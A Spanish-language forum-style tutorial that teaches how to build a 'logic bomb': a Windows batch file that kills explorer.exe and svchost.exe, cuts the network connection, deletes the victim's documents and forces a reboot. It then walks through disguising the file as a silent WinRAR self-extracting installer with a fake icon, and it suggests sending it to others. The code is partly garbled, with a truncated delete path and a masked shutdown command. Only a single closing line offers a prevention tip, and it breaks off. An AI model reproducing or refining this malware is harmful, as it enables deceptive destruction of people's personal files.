Bombas lgicas, todo lo que debes saber.

Bueno chicos, hace rato, bastante tiempo vengo experimentando con bombas lgicas. Para lo
que no sepan que es, puede llamarse a un programa, o archivo, un .exe el cual est
programado para "X" accin en "X" tiempo en "X" sistema opertivo y en "X" usuario.
Cada bomba lgica, es programable por su creador, es decir vos pods programar cuando
quers que se active como :
-La ejecucion de un programa
-Abrir un archivo
-Determinada fecha y hora
-O simplemente al hacerle doble click
Ests bombas suelen ser disfrazadas para que parezcan archivos normales o instalaciones,
como dice al principio.
Una forma de hacerlo, sencillamente es con un bloc de notas, si esa aplicacin que ya viene
en todos los windows.
Tras un par de comandos de msdos pods programar esta bomba para hacer lo que vos
quieras.

Algo que ver con el hacking?

No, para mi no. El hacking es algo mas avanzado dira yo, esto podra usarse por un
"lammer" pare decir "mira, formati esta pc desde mi casa". No tiene nada que ver con trabajar
en redes, ni es conexiones ni tens que tener nada de conocimiento, con un par de comandos
que te sepas listo. Es ms podra yo tranquilamente hacer un par y subirlas a algn host de
descargas as udstedes lo tienen y se lo mandan a quien quieren y listo, basta con armarse un
poco de ingenio y vivesa. En fin, no tiene nada que ver al hacking.

Como crear una bomba?

Una manera fcil de crear una de estos mounstritos es a travs del bloc de notas como dice
bien arriba.
El primer paso, ya teniendo abierto el bloc de notas es tipiar lo siguiente:

@hecho off

Esto se pone al principio de toda bomba lgica.

El paso siguiente, para borrar y dejar requerimientos libres en la pc (cosa que ami me parece
mas cmodo) es cerrar todos los programas abiertos y que se estn ejecutando. Esto aligera
el proceso e impide a la vctima en pensar que hacer segn los programas que cerrs. En mi
caso por ejemplo cerrara el explorer.exe ysvchost.exe [El comando para cerrar programas
es "tasskkill /f /im "nombre"]
Entonces quedara as:

@echo off
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe

El paso siguiente es desconectarse de internet, otra manera de liberar recursos y acelerar el

proceso. Para es ponemos ipconfig /release (desconecta la IP de todos los servidores)

@echo off
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
ipconfig /release

Ac ya tenemos la base, vemos como se desconecta de internet, como cierra el explorer y el

svchost. Estos dos programas que se cierran deja sin funcin a la persona que manipula la PC
"infectada". Ya que por lo menos le das click a la cruz y listo, no?. Para evitar eso segu
leyendo abajo.
El objetivo de esta bomba, ser borrar todos los documentos, no es destructiva pero
realmente un dolor de huevos, mas si tens fotos viejas, lindos recuerdos, documentos
importantes, cosas de la facu, del colegio o del laburo. Realmente un garrn.
Para borrar carpetas o archivos debemos poner el comando de eliminar, y a continuacin el
nombre de la carpeta, en caso que sea un archivo, la ruta de donde proviene el mismo. [El
comando pare eliminar es del /s /f /q "carpeta o archivo"]
Quedara as:

@echo off
ipconfig /release
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe

Para completar la fase, pondr que se reinicie la PC. Entonces agregamos "shu*** -r -f -t 01"
(para ver mas comandos de shu***, tipiar en "cmd" "shu***" y presionar ENTER)
Y al terminar, escribimos "exit" para terminar la bomba.

El final sera as:

@echo off
ipconfig /release
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
del /s /f /q "C
shu*** -r -f -t 01
exit

Bueno, ya tenemos la base completada, tenemos que har la bomba al ejecutarse... pero
como se ejecuta si es un bloc de notas, en todo caso cuando lo ejecutemos se abrir el bloc
con las lineas que escribimos antes... no hace nada en la pc....
Por eso debemos guardarlo en .bat. Una vez escrito todo, van a archivo, guardar como y le
ponen por ejemplo "bomba.bat" y lo guardan
Ahora, es hora de disfrazarlo porque no creo que nadie se anime a abrir un archivo
desconocido con un icono raro y un nombre con extencion .bat (WTF!)

HACIENDO A LA BOMBA UN .EXE

Para ser mas creible, se puede hacer un .exe con la bomba. Es decir, hacerle doble click, que
parezca una instalacion normal y al finalizar no pasa nada. Al reiniciarse el computador se
comenzar a ejecutar la bomba.
El primer paso, necesitan el winRar
Hacen click derecho al archivo .bat que hicieron tiempito antes y le dan a "aadir al archivo"
que al lado esta el icono del winrar y les abrir una ventana con opciones para aadir el
archivo a un .rar
Nosotros queremos .exe, asi que al costado de la derecha tildamos la opcion que dice "crear
archivo auto-extraible".
Vern como el nombre cambia a bomba.exe al tildar esa opcin.
Como queremos que esta accin sea oculta y no se vea ningun proceso, vamos a ponerlo
oculto.
Go pestaas "avanzado" y entran a la opcion "autoextraible". Les abre otra ventana aparte,
buscan la pestaa "MODO" y tildan donde dice "ocultar todo".
En la pestaa "texto e icono" pueden personalizar y cubrir el archivo para ponerle otro icono
desde ah o cambiarle el nombre. (opcional)

Al terminar le dan click a "ACEPTAR" y listo, nuestra bomba esta completa.

Lo que har:
Al ejecutarse no pasar nada, al reiniciarse la computadora, sin llegar a abrir el explorer ni
nada abrir una ventana de ms-dos, se desconectar de internet y borrar todos los
documentos y archivos que estn en "mis documentos". No puede cancelarse.

COMO EVITAR ATAQUES DE BOMBAS

Es realmente ms fcil de lo que piensan, cuando ven un "portable" muy tentador, nunca lo
bajen si tener comentarios a favor antes. Esto les ahorrar bronca, tiempo y archivos